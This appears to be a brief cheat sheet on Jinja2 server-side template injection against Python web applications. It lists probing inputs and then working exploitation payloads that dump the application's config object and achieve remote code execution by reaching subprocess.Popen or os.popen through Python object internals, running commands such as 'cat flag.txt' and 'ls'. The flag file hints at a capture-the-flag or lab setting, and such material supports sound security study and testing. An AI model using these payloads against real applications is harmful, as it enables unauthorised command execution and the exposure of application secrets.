Discovery
The server will run Python in the back-end.
Jinja code example:
Input
<h1> Greetings, {{ userName }}</h1>
{% if qualities %}
Here are a couple of qualities that make you special:
<ul>
{% for q in qualities %}
<li>{{q}}</li>
{% endfor %}
</ul>
{% endif %}
Input
{{5*"5"}}
Output
55555
Input
{{ request }}
Output
<Request 'http://example.com/api/jinja' [POST]>
Exploitation
Access config variable
{{config|pprint}}
Remote Code Execution
Exploit the SSTI by calling subprocess.Popen
! The number 396 will vary depending of the application.
the number 396 will vary depending of the application.
{{''.__class__.mro()[1].__subclasses__()}} # find the Popen Offset
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}